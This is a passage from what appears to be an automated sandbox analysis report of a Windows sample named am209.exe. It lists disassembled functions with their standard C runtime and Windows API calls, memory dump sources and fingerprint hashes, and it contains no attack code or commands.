                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0563b9878ec20761c3ab997bdba08a844f0e2f7bdd37e8635d6b67d99adc4c3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5151A2B2910216AFEF209F65CC85FEB7BAAEF46750F144429FA04DA290D7318D90CB70
                                                                                                                                                                                                                                                    Function 006C5890 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 006C6CF0: GetLastError.KERNEL32(?,?,?,006BE157,?,?,?,?,006BEFF2,?), ref: 006C6CF5
                                                                                                                                                                                                                                                      • Part of subcall function 006C6CF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,006BE157,?,?,?,?,006BEFF2,?), ref: 006C6D93
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C5B7B
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C5B94
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C5BD2
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C5BDB
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C5BE7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorLast
                                                                                                                                                                                                                                                    • String ID: C
                                                                                                                                                                                                                                                    • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                                                    • Opcode ID: 4e66c924cfd111d290983baccce5222a2907fa61c487e5962051783b1ee36bc4
                                                                                                                                                                                                                                                    • Instruction ID: 8f19dcd081aa35b494b060273e29d938ac8d6612f9bc8f3c3eb1b9ad0e8952f7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e66c924cfd111d290983baccce5222a2907fa61c487e5962051783b1ee36bc4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16B13975A016199BDB24DF18CC84FA9B7B6FF48314F5045AEE84AA7351DB30AE90CF44
                                                                                                                                                                                                                                                    Function 006C5405 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 006C8305: HeapAlloc.KERNEL32(00000000,?,?,?,006CFA70,00000220,?,?,?,?,?,?,006BEFF2,?), ref: 006C8337
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C5514
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C552B
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C5548
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C5563
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C557A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$AllocHeap
                                                                                                                                                                                                                                                    • String ID: lMn
                                                                                                                                                                                                                                                    • API String ID: 1835388192-1364301377
                                                                                                                                                                                                                                                    • Opcode ID: 156d2224485241eb78ea282c03e95e4ce85e709d3a6e34c1c66916a80da3c0c6
                                                                                                                                                                                                                                                    • Instruction ID: 3a25f381321acfa22be56672a3d1c4808f3722d56f2b3a3d1a422e470cfc7b2a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 156d2224485241eb78ea282c03e95e4ce85e709d3a6e34c1c66916a80da3c0c6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E518D72A00B049FDB219F69CC41FBA77F7EF54720B54456DE80ADB250EB31EA818B84
                                                                                                                                                                                                                                                    Function 006A2260 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: list too long
                                                                                                                                                                                                                                                    • API String ID: 0-1124181908
                                                                                                                                                                                                                                                    • Opcode ID: 15361e8e2528d372f49060a1997ab3a66726b9f0028ddbb946a03abee6eb86fe
                                                                                                                                                                                                                                                    • Instruction ID: d51f7fd3d64d7599be2511460ab2baa576fcb07ab0fb14ccad37dcd4ef9add15
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15361e8e2528d372f49060a1997ab3a66726b9f0028ddbb946a03abee6eb86fe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B51AFB0D443599BDB10EF54CC45BAAF7BAEF09300F0052A9E908AB281DB70AE80CF55
                                                                                                                                                                                                                                                    Function 006BE9D6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: Yn$Xn
                                                                                                                                                                                                                                                    • API String ID: 0-2472474362
                                                                                                                                                                                                                                                    • Opcode ID: 260bbd332ba0a040096fbd684a33fc3163eb24760617c0337dcff68575d71bdb
                                                                                                                                                                                                                                                    • Instruction ID: 6a117887c3616ad96a41500a91605017617f9c9ba92b383f4f9a37b877de6290
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 260bbd332ba0a040096fbd684a33fc3163eb24760617c0337dcff68575d71bdb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E041CAB1A00744AFE7249F78CC41BEABBEBFB84710F10852EF111DB781D676A9818784
                                                                                                                                                                                                                                                    Function 006BC710 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 006BC747
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 006BC74F
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 006BC7D8
                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 006BC803
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 006BC858
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: c87a66b26df29218523504e534c5386ea989ead48e3b3ddb3717feb3b60045c0
                                                                                                                                                                                                                                                    • Instruction ID: f8dc3603ca166c911b527798836ea7861bd04d97fcf299a69bbd73f2d88c1da5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c87a66b26df29218523504e534c5386ea989ead48e3b3ddb3717feb3b60045c0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F41B3B4A002099BCF00DF68C895ADEBBA7EF45324F14806AE8149B352DB31DA95CF90
                                                                                                                                                                                                                                                    Function 006B4E30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006B4E66
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006B4E86
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006B4EA6
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 006B4F41
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006B4F59
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                    • String ID: 9=k
                                                                                                                                                                                                                                                    • API String ID: 459529453-1685321571
                                                                                                                                                                                                                                                    • Opcode ID: 435aa2fb57092c2c8cbac1eafb044447b977a4defecc7e9cb287097a684574e3
                                                                                                                                                                                                                                                    • Instruction ID: 52ce3bb5ab9390e0bb186f4be21274ac5e6f6f63778b27a4dca07d773c128db3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 435aa2fb57092c2c8cbac1eafb044447b977a4defecc7e9cb287097a684574e3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53417CB19002158FCB24DF94C981AEEBBBAFF44B24F14416DE8056B342DF30AD86CB95
                                                                                                                                                                                                                                                    Function 006C85A5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                    • API String ID: 0-537541572
                                                                                                                                                                                                                                                    • Opcode ID: 4c7d0d00674851b6a5e96697bf4549f5e1a19600f5c27b384551a492a72ed837
                                                                                                                                                                                                                                                    • Instruction ID: 403d9d5e63dd3d087dd9c3ba5bf20f83b9a0fecb2a5269ad961c0584ee529152
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c7d0d00674851b6a5e96697bf4549f5e1a19600f5c27b384551a492a72ed837
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B121D271A01360AFCB328A369C88FBA376BDB057A0F251519ED16EB391DF30DD0096E0
                                                                                                                                                                                                                                                    Function 006D1306 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 006D1052: _free.LIBCMT ref: 006D1077
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D1354
                                                                                                                                                                                                                                                      • Part of subcall function 006C80D6: HeapFree.KERNEL32(00000000,00000000,?,006D107C,?,00000000,?,?,?,006D131F,?,00000007,?,?,006D17C4,?), ref: 006C80EC
                                                                                                                                                                                                                                                      • Part of subcall function 006C80D6: GetLastError.KERNEL32(?,?,006D107C,?,00000000,?,?,?,006D131F,?,00000007,?,?,006D17C4,?,?), ref: 006C80FE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D135F
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D136A
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D13BE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D13C9
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D13D4
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D13DF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                                                                                                                                                                                                                    • Instruction ID: a9eb8aab93a5ee02451f8f22f4d3c7b265a654b666ed32bb375869fda3de4853
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB117231D41744FAE670BBB0CC07FEB779EAF01700F404C2EB29A6A292DEA4B9454695
                                                                                                                                                                                                                                                    Function 006AC6EE Relevance: 9.4, APIs: 6, Instructions: 418COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 19bf7aa03f6f6dab6c7ed992e465acd72c21740b6d0d6a48725d23ee63b13e6b
                                                                                                                                                                                                                                                    • Instruction ID: 9a3bf47c93d3b8bb30cc63cee4f04a1a6cf06fd80769dfbd50c117374d1a05ef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19bf7aa03f6f6dab6c7ed992e465acd72c21740b6d0d6a48725d23ee63b13e6b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ECE1F471A001489BEF18EB68CD85BEDBB77AF42320F54824CE415AB2D2D7359E84CF95
                                                                                                                                                                                                                                                    Function 006C768F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 006C76D7
                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 006C78BC
                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 006C78D9
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006C7921
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006C7961
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 006C7A09
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1735259414-0
                                                                                                                                                                                                                                                    • Opcode ID: 63b5026bb9eb3579ae544b705f2f43e1d992003cb887b6fc73badb0df33fa3f8
                                                                                                                                                                                                                                                    • Instruction ID: a5862ceec2cc567674902ef6bf9a9ee5394199d8ee94941fc14770bef5cce2ac
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63b5026bb9eb3579ae544b705f2f43e1d992003cb887b6fc73badb0df33fa3f8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43C17C75D052589FDB15CFA8C880AEDBBB6EF09314F28416EE855FB341E6319A42CF60
                                                                                                                                                                                                                                                    Function 006B46A0 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006B46D5
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006B46F7
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006B4717
                                                                                                                                                                                                                                                    • __Getctype.LIBCPMT ref: 006B47AD
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 006B47CC
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006B47E4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1102183713-0
                                                                                                                                                                                                                                                    • Opcode ID: 81656d9f65d1493696ffb541bfffb1c2bbbfe9a33d032a6d5463a592afca2c22
                                                                                                                                                                                                                                                    • Instruction ID: 4b6a134f56b244ac839664a985f473f720703ffa3fde6d31704f646c5fe8d319
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81656d9f65d1493696ffb541bfffb1c2bbbfe9a33d032a6d5463a592afca2c22
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62418CB1A002158FCB21DF54C841AEEB7FAEF55710F24416DE806AB392DF30AD86CB95
                                                                                                                                                                                                                                                    Function 006BC8D4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,006BC8CB,006BAF64,006B7C79,495BF602,?,?,?,00000000,006DC8A7,000000FF,?,00692576,?,?), ref: 006BC8E2
                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006BC8F0
                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006BC909
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,006DC8A7,000000FF,?,00692576,?,?,?,00693BA5,00000000,?,00000000,006DC240,000000FF), ref: 006BC95B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                    • Opcode ID: 96c15d5180da97651ff7d5e5a10cf9054f1f2b8fbbe63edc153d8f6ddd9a9999
                                                                                                                                                                                                                                                    • Instruction ID: 59c5f71ded9b736c323ad4949c3fb0318b14ae66cf17de773e98049a15974565
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96c15d5180da97651ff7d5e5a10cf9054f1f2b8fbbe63edc153d8f6ddd9a9999
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D01DD7610D7166EF7647778ED855F72647DB03772320022EF510891E2EF124D82A398
                                                                                                                                                                                                                                                    Function 006CF567 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\1004899001\am209.exe, xrefs: 006CF56C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
